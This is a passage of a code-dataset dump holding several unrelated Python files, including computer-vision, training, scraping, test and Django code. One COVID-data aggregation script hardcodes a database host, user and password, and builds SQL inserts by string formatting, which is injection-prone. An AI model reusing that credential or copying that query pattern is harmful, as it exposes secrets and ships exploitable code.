print(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\n # print(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n\n _, frame = cap.read()\n# frame = imutils.resize(frame, width=640)\n # frame = cv2.resize(frame, None, fx=2, fy=2)\n frame_id += 1\n height, width, channels = frame.shape\n\n # cv2.line(image, start_point, end_point, color, thickness)\n cv2.line(frame, (int(width/2), 0), (int(width/2), width), (0, 255, 0), 1)\n cv2.line(frame, (0, int(height / 2)), (width, int(height / 2)), (0, 255, 0), 1)\n # Detecting objects\n blob = cv2.dnn.blobFromImage(frame, 0.00392, (224, 224), (0, 0, 0), True, crop=False)\n\n net.setInput(blob)\n outs = net.forward(output_layers)\n\n # HUD\n class_ids = []\n confidences = []\n boxes = []\n for out in outs:\n for detection in out:\n scores = detection[5:]\n class_id = np.argmax(scores)\n confidence = scores[class_id]\n if confidence > 0.0001:\n # Object detected\n\n # if confiede\n\n center_x = int(detection[0] * width)\n center_y = int(detection[1] * height)\n w = int(detection[2] * width)\n h = int(detection[3] * height)\n\n # Rectangle coordinates\n x = int(center_x - w / 2)\n y = int(center_y - h / 2)\n\n boxes.append([x, y, w, h])\n confidences.append(float(confidence))\n class_ids.append(class_id)\n\n indexes = cv2.dnn.NMSBoxes(boxes, confidences, 0.5, 0.4)\n # print(indexes)\n\n for i in range(len(boxes)):\n if i in indexes:\n x, y, w, h = boxes[i]\n label = str(classes[class_ids[i]])\n \n \n # bottle hoile dekhabe\n if label.lower() == \"bottle\" or label.lower()==\"orange\" or label.lower() == \"apple\": \n confidence = confidences[i]\n color = colors[class_ids[i]]\n # cv2.rectangle(frame, (x, y), (x + w, y + h), color, 2)\n # cv2.circle(frame,(center_x,center_y),5, color,-1)\n cv2.line(frame, (int(width/2), int(height/2)), (center_x, center_y), color, 2)\n cv2.putText(frame, label + \" \" + str(round(confidence * 100)) + \"%\", (x, y + 30), font, 0.7, color, 1)\n \n horizontal_distance = (center_x - int(width/2))\n vertical_distance = (int(height/2)- center_y)\n text = str(horizontal_distance)+ \",\" +str(vertical_distance)+ \"\\n\"\n textForArd = str.encode(text)\n print(text)\n #ser.write(textForArd)\n elapsed_time = time.time() - time_start\n fps = frame_id / elapsed_time\n cv2.putText(frame, \"FPS:\" + str(round(fps, 2)), (10, 30), font, 1, (0, 0, 255), 1)\n cv2.putText(frame, \"Press 'Q' to close the window\", (100, 30), font, 1, (0, 0, 255), 1)\n #print(\"FPS:\"+ str(round(fps, 2)))\n cv2.imshow(\"Image\", frame)\n key = cv2.waitKey(24)\n if key == ord('q'):\n break\n\ncv2.destroyAllWindows()", "sub_path": "TEST%1.py", "file_name": "TEST%1.py", "file_ext": "py", "file_size_in_byte": 3766, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "cv2.dnn.readNet", "line_number": 12, "usage_type": "call"}, {"api_name": "cv2.dnn", "line_number": 12, "usage_type": "attribute"}, {"api_name": "numpy.random.uniform", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 18, "usage_type": "attribute"}, {"api_name": "cv2.FONT_HERSHEY_PLAIN", "line_number": 19, "usage_type": "attribute"}, {"api_name": "cv2.CAP_PROP_FRAME_WIDTH", "line_number": 20, "usage_type": "attribute"}, {"api_name": "cv2.CAP_PROP_FRAME_HEIGHT", "line_number": 21, "usage_type": "attribute"}, {"api_name": "cv2.VideoCapture", "line_number": 23, "usage_type": "call"}, {"api_name": "time.time", "line_number": 25, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 39, "usage_type": "call"}, 
{"api_name": "cv2.line", "line_number": 40, "usage_type": "call"}, {"api_name": "cv2.dnn.blobFromImage", "line_number": 42, "usage_type": "call"}, {"api_name": "cv2.dnn", "line_number": 42, "usage_type": "attribute"}, {"api_name": "numpy.argmax", "line_number": 54, "usage_type": "call"}, {"api_name": "cv2.dnn.NMSBoxes", "line_number": 74, "usage_type": "call"}, {"api_name": "cv2.dnn", "line_number": 74, "usage_type": "attribute"}, {"api_name": "cv2.line", "line_number": 89, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 90, "usage_type": "call"}, {"api_name": "time.time", "line_number": 98, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 100, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 101, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 103, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 104, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 108, "usage_type": "call"}]} +{"seq_id": "509290444", "text": "import torch\r\nfrom torch.utils.data import DataLoader\r\nfrom torch.autograd import Variable\r\nimport torch.optim as optim\r\nfrom torch.utils.tensorboard import SummaryWriter\r\n\r\nimport os\r\nimport argparse\r\n\r\nfrom model import Net\r\nfrom utils.dataset import ReadDataset\r\n\r\n\r\ndef train(train_dataloader, model, mse_loss, optimizer, epoch, writer, config):\r\n model.train()\r\n running_loss = 0.\r\n total_average_loss = 0.\r\n\r\n for batch_i, (_, imgs, targets) in enumerate(train_dataloader):\r\n imgs = Variable(imgs.float()).cuda()\r\n targets = Variable(targets.view((-1, 10)).float(), requires_grad=False).cuda()\r\n\r\n optimizer.zero_grad()\r\n\r\n output = model(imgs)\r\n\r\n loss = mse_loss(output, targets)\r\n\r\n loss.backward()\r\n optimizer.step()\r\n\r\n print('[Epoch %d/%d, Batch %d/%d] [Loss: total %f]'\r\n %\r\n (epoch+1,\r\n config.epochs,\r\n batch_i+1,\r\n len(train_dataloader),\r\n loss.item())\r\n )\r\n\r\n # save the loss every 100 iterations\r\n\r\n running_loss += loss.item()\r\n total_average_loss += loss.item()\r\n\r\n if batch_i % 100 == 99:\r\n global_step = batch_i + epoch * len(train_dataloader) + 1\r\n writer.add_scalar('Train Loss', running_loss / 100, global_step)\r\n writer.flush()\r\n running_loss = 0.\r\n\r\n # save the weights of every epoch\r\n if epoch % config.checkpoint_interval == 0:\r\n total_average_loss /= len(train_dataloader)\r\n torch.save(model.state_dict(),\r\n '%s/epoch_%d_train_%.6f.pth' % (config.checkpoint_dir, epoch + 1, total_average_loss))\r\n\r\n\r\ndef valid(val_dataloader, model, mse_loss, epoch, writer, config):\r\n print('now evaluate on val dataset.................................................')\r\n model.eval()\r\n running_loss = 0.\r\n\r\n with torch.no_grad():\r\n for batch_i, (_, imgs, targets) in enumerate(val_dataloader):\r\n imgs = Variable(imgs).cuda()\r\n targets = Variable(targets.view((-1, 10)), requires_grad=False).cuda()\r\n\r\n output = model(imgs)\r\n\r\n loss = mse_loss(output, targets)\r\n\r\n running_loss += loss.item()\r\n\r\n writer.add_scalar('Val Loss', running_loss / len(val_dataloader), epoch + 1)\r\n writer.flush()\r\n\r\n pth_filenames = os.listdir(config.checkpoint_dir)\r\n for filename in pth_filenames:\r\n if 'epoch_%d' % (epoch + 1) in filename:\r\n pth_oldname = config.checkpoint_dir + '/' + filename\r\n pth_newname = os.path.splitext(pth_oldname)[0] + '_val_%.6f.pth' % (running_loss / len(val_dataloader))\r\n os.rename(pth_oldname, pth_newname)\r\n return 
running_loss / len(val_dataloader)\r\n\r\n\r\ndef main():\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('--epochs', type=int, default=80, help='number of epochs')\r\n parser.add_argument('--batch_size', type=int, default=32, help='size of each img batch')\r\n parser.add_argument('--train_path', type=str, default='train.txt', help='train dataset path')\r\n parser.add_argument('--val_path', type=str, default='valid.txt', help='valid dataset path')\r\n parser.add_argument('--checkpoint_interval', type=int, default=1, help='interval between saving model weights')\r\n parser.add_argument('--checkpoint_dir', type=str, default='checkpoints', help='directory for saving model weights')\r\n parser.add_argument('--tensorboard_dir', type=str, default='logs', help='directory for saving logs')\r\n config = parser.parse_args()\r\n print(config)\r\n\r\n torch.set_num_threads(4)\r\n\r\n os.makedirs(config.checkpoint_dir, exist_ok=True)\r\n os.makedirs(config.tensorboard_dir, exist_ok=True)\r\n\r\n writer = SummaryWriter(config.tensorboard_dir)\r\n\r\n model = Net().cuda()\r\n\r\n train_dataloader = DataLoader(ReadDataset(config.train_path),\r\n batch_size=config.batch_size, shuffle=True, num_workers=0, pin_memory=True)\r\n if config.val_path:\r\n val_dataloader = DataLoader(ReadDataset(config.val_path),\r\n batch_size=config.batch_size, shuffle=True, num_workers=0, pin_memory=True)\r\n\r\n optimizer = optim.Adam(model.parameters(), lr=0.001)\r\n scheduler = optim.lr_scheduler.StepLR(optimizer, step_size=1, gamma=0.1)\r\n mse_loss = torch.nn.SmoothL1Loss().cuda()\r\n\r\n min_valloss = 100000\r\n early_stop = 0\r\n for epoch in range(config.epochs):\r\n train(train_dataloader, model, mse_loss, optimizer, epoch, writer, config)\r\n\r\n if config.val_path:\r\n valloss = valid(val_dataloader, model, mse_loss, epoch, writer, config)\r\n if valloss > min_valloss - 1e-4:\r\n early_stop += 1\r\n if early_stop == 5:\r\n scheduler.step()\r\n if early_stop == 10:\r\n print(\"The val loss doesn't decrease for 5 epochs, early stop!\")\r\n break\r\n else:\r\n early_stop = 0\r\n min_valloss = valloss\r\n\r\n\r\n writer.close()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n", "sub_path": "KITTI_Dataset/train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 5195, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "model.train", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 55, "usage_type": "call"}, {"api_name": "model.state_dict", "line_number": 55, "usage_type": "call"}, {"api_name": "model.eval", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 66, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 67, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path", "line_number": 82, "usage_type": "attribute"}, {"api_name": "os.rename", "line_number": 83, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 88, "usage_type": "call"}, {"api_name": "torch.set_num_threads", "line_number": 99, "usage_type": "call"}, 
{"api_name": "os.makedirs", "line_number": 101, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.utils.tensorboard.SummaryWriter", "line_number": 104, "usage_type": "call"}, {"api_name": "model.Net", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 108, "usage_type": "call"}, {"api_name": "utils.dataset.ReadDataset", "line_number": 108, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 111, "usage_type": "call"}, {"api_name": "utils.dataset.ReadDataset", "line_number": 111, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 114, "usage_type": "name"}, {"api_name": "model.parameters", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler.StepLR", "line_number": 115, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler", "line_number": 115, "usage_type": "attribute"}, {"api_name": "torch.optim", "line_number": 115, "usage_type": "name"}, {"api_name": "torch.nn.SmoothL1Loss", "line_number": 116, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 116, "usage_type": "attribute"}]} +{"seq_id": "403049722", "text": "#!/usr/bin/env python3\nimport psycopg2\nimport requests\nfrom datetime import datetime\nimport re\n\npage_size = 2000\naggregation_frequency_max = 100\n\ndef download_data():\n \"\"\"Downloads data from https://services7.arcgis.com and writes them to the DB \"\"\"\n print(\"Let's start ...\")\n i = 0\n while i < aggregation_frequency_max:\n offset = i * page_size\n url = 'https://services7.arcgis.com/mOBPykOjAyBO2ZKk/arcgis/rest/services/RKI_COVID19/FeatureServer/0/query?f' \\\n '=json&where=1%3D1&outFields=*&resultOffset=' + str(offset)\n r = requests.get(url, allow_redirects=True)\n json_tmp = r.json()\n # open(\"rki_data/\" + str(offset) +'-rki.json', 'wb').write(json_tmp)\n cleaned_columns = cleanup_data(json_tmp[\"features\"])\n if len(cleaned_columns) is 0:\n break\n write_to_table(cleaned_columns)\n i += 1\n\ndef cleanup_data(json_files):\n result = []\n for attributes in json_files:\n # parse age group\n if attributes[\"attributes\"][\"Altersgruppe\"] == 'unbekannt':\n age_group_start = 'null'\n age_group_end = 'null'\n elif attributes[\"attributes\"][\"Altersgruppe\"] == 'A80+':\n age_group_start = '80'\n age_group_end = '99'\n else:\n age_group = re.search('A([0-9]*)-A([0-9]*)', attributes[\"attributes\"][\"Altersgruppe\"], re.IGNORECASE)\n age_group_start = age_group.group(1)\n age_group_end = age_group.group(2)\n\n # parse notification_date\n ts = int(int(attributes[\"attributes\"][\"Meldedatum\"]) / 1000)\n notification_date = datetime.utcfromtimestamp(ts).strftime('%Y-%m-%d')\n\n item = {\n 'state_id': parse_int(attributes[\"attributes\"][\"IdBundesland\"]),\n 'state': attributes[\"attributes\"][\"Bundesland\"],\n 'sex': attributes[\"attributes\"][\"Geschlecht\"],\n 'province_id': parse_int(attributes[\"attributes\"][\"IdLandkreis\"]),\n 'province': attributes[\"attributes\"][\"Landkreis\"],\n 'object_id': int(attributes[\"attributes\"][\"ObjectId\"]),\n 'notification_date': notification_date,\n 'death_count': int(attributes[\"attributes\"][\"AnzahlTodesfall\"]),\n 'case_count': int(attributes[\"attributes\"][\"AnzahlFall\"]),\n 'age_group_start': age_group_start,\n 'age_group_end': age_group_end\n }\n\n if item[\"state\"] == '-nicht erhoben-':\n item[\"state\"] = \"\"\n\n if 
item[\"province\"] == '-nicht erhoben-':\n item[\"province\"] = \"\"\n\n result.append(item)\n return result\n\n\ndef parse_int(s):\n try:\n return int(s)\n except ValueError:\n return -1\n\n\ndef write_to_table(content):\n conn = None\n try:\n conn = psycopg2.connect(\"dbname='wirvsvirus' user='wirvsvirus' host='marc-book.de' password='[n2^3kKCyxUGgzuV'\")\n\n cur = conn.cursor()\n\n for item in content:\n query = \"\"\"\n INSERT INTO rki_data_germany (state_id, state, sex, province_id, province, object_id, notification_date, death_count, case_count, age_group_start, age_group_end, extraction_date)\n VALUES\n ({}, '{}', '{}', {}, '{}', {}, date'{}', {}, {}, {}, {}, now())\n \"\"\".format(\n item['state_id'],\n item['state'],\n item['sex'],\n item['province_id'],\n item['province'],\n item['object_id'],\n item['notification_date'],\n item['death_count'],\n item['case_count'],\n item['age_group_start'],\n item['age_group_end']\n )\n\n cur.execute(query)\n\n cur.close()\n conn.commit()\n\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n\n finally:\n if conn is not None:\n conn.close()\n\n\nif __name__ == '__main__':\n download_data()\n", "sub_path": "fillDatabase/aggregate.py", "file_name": "aggregate.py", "file_ext": "py", "file_size_in_byte": 3978, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "requests.get", "line_number": 18, "usage_type": "call"}, {"api_name": "re.search", "line_number": 38, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 38, "usage_type": "attribute"}, {"api_name": "datetime.datetime.utcfromtimestamp", "line_number": 44, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 44, "usage_type": "name"}, {"api_name": "psycopg2.connect", "line_number": 80, "usage_type": "call"}, {"api_name": "psycopg2.DatabaseError", "line_number": 108, "usage_type": "attribute"}]} +{"seq_id": "401171447", "text": "from unittest import TestCase\nfrom unittest.mock import Mock, patch\n\nfrom webtest import TestApp\n\nimport ruterstop\n\n\nclass WebAppTestCase(TestCase):\n def setUp(self):\n self.app = TestApp(ruterstop.webapp)\n pass\n\n def tearDown(self):\n self.app.reset()\n pass\n\n @patch(\"ruterstop.format_departure_list\", return_value=None)\n @patch(\"ruterstop.get_departures\", return_value=dict(a=\"foo\"))\n def test_calls_api_on_proper_path(self, get_mock, format_mock):\n res = self.app.get(\"/1234\")\n self.assertEqual(res.content_type, \"text/plain\")\n get_mock.assert_called_once_with(stop_id=1234)\n format_mock.assert_called_once_with(dict(a=\"foo\"))\n\n @patch(\"ruterstop.get_departures\", return_value=None)\n def test_simple_404_error(self, mock):\n res = self.app.get(\"/\", expect_errors=True)\n self.assertEqual(res.content_type, \"text/plain\")\n self.assertEqual(res.status_code, 404)\n self.assertEqual(res.body, \"Ugyldig stoppested\".encode())\n self.assertEqual(mock.call_count, 0)\n\n @patch(\"ruterstop.get_departures\", return_value=None)\n def test_simple_500_error(self, mock):\n mock.side_effect = Exception(\"barf voof\")\n\n with self.assertLogs(logger=\"ruterstop\", level=\"ERROR\") as log:\n res = self.app.get(\"/1234\", expect_errors=True)\n self.assertEqual(res.content_type, \"text/plain\")\n self.assertEqual(res.status_code, 500)\n self.assertEqual(res.body, \"Feil på serveren\".encode())\n self.assertEqual(mock.call_count, 1)\n\n self.assertRegex(log.output[0], r\"barf voof\")\n\n @patch(\"ruterstop.format_departure_list\", 
return_value=None)\n @patch(\"ruterstop.get_departures\", return_value=dict(a=\"foo\"))\n def test_calls_api_with_querystring_params(self, get_mock, format_mock):\n self.app.get(\"/1234?direction=inbound&min_eta=5&bogusargs=1337\")\n get_mock.assert_called_once_with(stop_id=1234)\n format_mock.assert_called_once_with(\n dict(a=\"foo\"), directions=\"inbound\", min_eta=5\n )\n", "sub_path": "ruterstop/tests/test_webapp.py", "file_name": "test_webapp.py", "file_ext": "py", "file_size_in_byte": 2094, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "unittest.TestCase", "line_number": 9, "usage_type": "name"}, {"api_name": "webtest.TestApp", "line_number": 11, "usage_type": "call"}, {"api_name": "ruterstop.webapp", "line_number": 11, "usage_type": "attribute"}, {"api_name": "unittest.mock.patch", "line_number": 18, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 19, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 26, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 34, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 47, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 48, "usage_type": "call"}]} +{"seq_id": "497984528", "text": "import os\nos.system('clear')\nimport requests\nfrom bs4 import BeautifulSoup\n\n#input = raw_input(\"Voer een zoek term in: \")\n#URL = \"https://www.na-kd.com/nl/lingerie\"\n\nURL = \"https://www.na-kd.com/nl/lingerie?sortBy=price&count=18&p_categories=c_1-32922_nl-nl\"\n\nheaders = {\"User-Agent\": 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15'}\n\npage = requests.get(URL, headers=headers )\n\nsoup = BeautifulSoup(page.content, 'html.parser')\ncount = 0\ntitel = soup.find(\"title\").get_text()\nfruits = [\"1\", \"2\", \"3\", \"4\", \"5\", \"6\"]\nfor x in fruits:\n count += 1\n print(count)\n prijs = soup.find(\"span\", itemprop=\"price\")#.get_text()\n print(prijs)\n\nprint(\"\")\nprint(titel)\nprint(\"\")\n", "sub_path": "NA-KD kopie 4.py", "file_name": "NA-KD kopie 4.py", "file_ext": "py", "file_size_in_byte": 741, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "os.system", "line_number": 2, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 13, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "144133459", "text": "# -*- coding: utf-8 -*-\n#!/usr/bin/env python\n#\n# Copyright (c) 2010-2014 Mariusz Smenzyk \n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\"\"\"\n\n@author: Mariusz Smenzyk\n@license: MIT License\n@contact: mariusz.smenzyk@sizeof.pl\n\"\"\"\nimport os\nimport re\n\nfrom setuptools import setup, find_packages\n\n\nREQUIREMENTS = [\n 'django-simple-captcha>=0.4.2',\n 'south>=1.0.2',\n 'django>=1.9'\n]\n\nCLASSIFIERS = [\n \"Development Status :: 4 - Beta\",\n \"Environment :: Web Environment\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python\",\n \"Framework :: Django\",\n \"License :: OSI Approved :: MIT License\",\n]\n\n\ndef dependency_links(packages):\n auth = '%s:%s@' % (os.environ.get('SIZEOF_PYPI_USER', ''), os.environ.get('SIZEOF_PYPI_PASSWORD', ''))\n pypi = 'http://%spypi.sizeof.pl/simple/' % (auth if len(auth) > 2 else '')\n return ['%s%s' % (pypi, re.search('[\\w+-]*', p).group(0)) for p in packages if p.startswith('sizeof')]\n\n\ndef read(fname):\n return open(os.path.join(os.path.dirname(__file__), fname)).read()\n\n\nsetup(\n name='sizeof-django-tellafriend',\n author='SIZEOF.PL | Mariusz Smenżyk',\n author_email='mariusz@sizeof.pl',\n url=\"https://bitbucket.org/sizeof/sizeof-django-tellafriend/\",\n description=\"SIZEOF.PL | Django Tell a Friend\",\n license='MIT',\n keywords=\"django tellafriend recommend\",\n version=__import__('tellafriend').get_version(),\n packages=find_packages(),\n include_package_data=True,\n zip_safe=False,\n install_requires=REQUIREMENTS,\n dependency_links=dependency_links(REQUIREMENTS),\n long_description=read('README.md'),\n package_data={\n 'tellafriend': [\n 'templates/tellafriend/*.html',\n 'templates/tellafriend/*.txt',\n 'locale/*/LC_MESSAGES/*',\n ],\n },\n)\n", "sub_path": "pypi_install_script/sizeof-django-tellafriend-0.1.3.tar/setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 2854, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "os.environ.get", "line_number": 52, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 52, "usage_type": "attribute"}, {"api_name": "re.search", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path", "line_number": 58, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 58, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 61, "usage_type": "call"}, {"api_name": "setuptools.find_packages", "line_number": 70, "usage_type": "call"}]} +{"seq_id": "151814746", "text": "import torch\r\nimport torch.nn.functional as F\r\nimport torch.nn as nn\r\n\r\n\r\n\r\nclass AttackPGD(nn.Module):\r\n def __init__(self, basic_net, config):\r\n super(AttackPGD, self).__init__()\r\n self.basic_net = basic_net\r\n self.rand = config['random_start']\r\n self.step_size = config['step_size']\r\n self.epsilon = config['epsilon']\r\n self.num_steps = config['num_steps']\r\n assert config['loss_func'] == 'xent', 'Only xent supported for now.'\r\n\r\n def forward(self, inputs, targets, t=None):\r\n x = inputs.detach()\r\n if t is None:\r\n t = inputs.data.new(1).uniform_(0.0,1.0)\r\n if self.rand:\r\n x = x + torch.zeros_like(x).uniform_(-self.epsilon, self.epsilon)\r\n for i in range(self.num_steps):\r\n x.requires_grad_()\r\n with 
torch.enable_grad():\r\n logits = self.basic_net(x, t=t)\r\n loss = F.cross_entropy(logits, targets, size_average=False)\r\n grad = torch.autograd.grad(loss, [x])[0]\r\n x = x.detach() + self.step_size*torch.sign(grad.detach())\r\n x = torch.min(torch.max(x, inputs - self.epsilon), inputs + self.epsilon)\r\n x = torch.clamp(x, 0, 1)\r\n # t1 = self.basic_net(x, t=t)\r\n # t2 = F.cross_entropy(t1, targets, size_average=False)\r\n return self.basic_net(x, t=t), x", "sub_path": "evasion_attack/AttackPGD.py", "file_name": "AttackPGD.py", "file_ext": "py", "file_size_in_byte": 1381, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "torch.nn.Module", "line_number": 7, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 7, "usage_type": "name"}, {"api_name": "torch.zeros_like", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.enable_grad", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.nn.functional.cross_entropy", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 27, "usage_type": "name"}, {"api_name": "torch.autograd.grad", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.autograd", "line_number": 28, "usage_type": "attribute"}, {"api_name": "torch.sign", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.min", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.clamp", "line_number": 31, "usage_type": "call"}]} +{"seq_id": "638262939", "text": "import os\n\nif os.environ.get(\"PRODUCTION_SERVER\", 'defaults as false') == \"True\":\n os.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"formhub.preset.production\")\nelse:\n os.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"formhub.preset.staging\")\n\n# This application object is used by the development server\n# as well as any WSGI server configured to use this file.\nfrom django.core.wsgi import get_wsgi_application\napplication = get_wsgi_application()\n", "sub_path": "formhub/wsgi.py", "file_name": "wsgi.py", "file_ext": "py", "file_size_in_byte": 453, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "os.environ.get", "line_number": 3, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 3, "usage_type": "attribute"}, {"api_name": "os.environ.setdefault", "line_number": 4, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 4, "usage_type": "attribute"}, {"api_name": "os.environ.setdefault", "line_number": 6, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 6, "usage_type": "attribute"}, {"api_name": "django.core.wsgi.get_wsgi_application", "line_number": 11, "usage_type": "call"}]} +{"seq_id": "408257256", "text": "import numpy as np\nfrom sklearn import datasets, metrics\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn import svm\n\ndiabetes = datasets.load_diabetes()\n\nx = diabetes.data[:, np.newaxis, 2]\ny = diabetes.target\n\nx_train,x_test,y_train,y_test=train_test_split(x,y,test_size=0.2)\n\n\nclf = svm.SVC(kernel='linear')\nclf.fit(x_train, y_train)\n\ny_pred=clf.predict(x_test)\n\nprint(\"accuracy of linear kernel is:\")\nprint(metrics.accuracy_score(y_test,y_pred))\n\nnewclf = svm.SVC(kernel='rbf')\nnewclf.fit(x_train, y_train)\n\ny_pred_new=newclf.predict(x_test)\n\nprint(\"accuracy of RBF kernel 
is:\")\nprint(metrics.accuracy_score(y_test,y_pred_new))", "sub_path": "Lab3/source/task3.py", "file_name": "task3.py", "file_ext": "py", "file_size_in_byte": 649, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "sklearn.datasets.load_diabetes", "line_number": 6, "usage_type": "call"}, {"api_name": "sklearn.datasets", "line_number": 6, "usage_type": "name"}, {"api_name": "numpy.newaxis", "line_number": 8, "usage_type": "attribute"}, {"api_name": "sklearn.cross_validation.train_test_split", "line_number": 11, "usage_type": "call"}, {"api_name": "sklearn.svm.SVC", "line_number": 14, "usage_type": "call"}, {"api_name": "sklearn.svm", "line_number": 14, "usage_type": "name"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 20, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 20, "usage_type": "name"}, {"api_name": "sklearn.svm.SVC", "line_number": 22, "usage_type": "call"}, {"api_name": "sklearn.svm", "line_number": 22, "usage_type": "name"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 28, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 28, "usage_type": "name"}]} +{"seq_id": "1790550", "text": "from django.shortcuts import render, get_object_or_404\nfrom aikidoleoni.core.forms import ContactForm\nfrom aikidoleoni.core.models import Page\nfrom aikidoleoni.blog.models import Post\n\ndef home(request):\n template = \"core/home.html\"\n page = get_object_or_404(Page, slug='home')\n context = dict(\n page=page,\n posts=Post.published_posts.all()[:3],\n )\n return render(request, template, context)\n\n\ndef contact(request):\n page = get_object_or_404(Page, slug='contato')\n context = dict(\n page=page,\n form = ContactForm()\n )\n template = \"core/contact.html\"\n\n if request.method == 'POST':\n form = ContactForm(request.POST)\n if not form.is_valid():\n context['form'] = form\n return render(request, template, context)\n try:\n if form.send_mail() > 0:\n context['success'] = \"Email enviado com sucesso\"\n except ConnectionRefusedError:\n context['success'] = \"Desculpe, não foi possível enviar sua \\\n mensagem.\"\n\n return render(request, template, context)\n\n\ndef about(request):\n page = get_object_or_404(Page, slug='sobre')\n context = 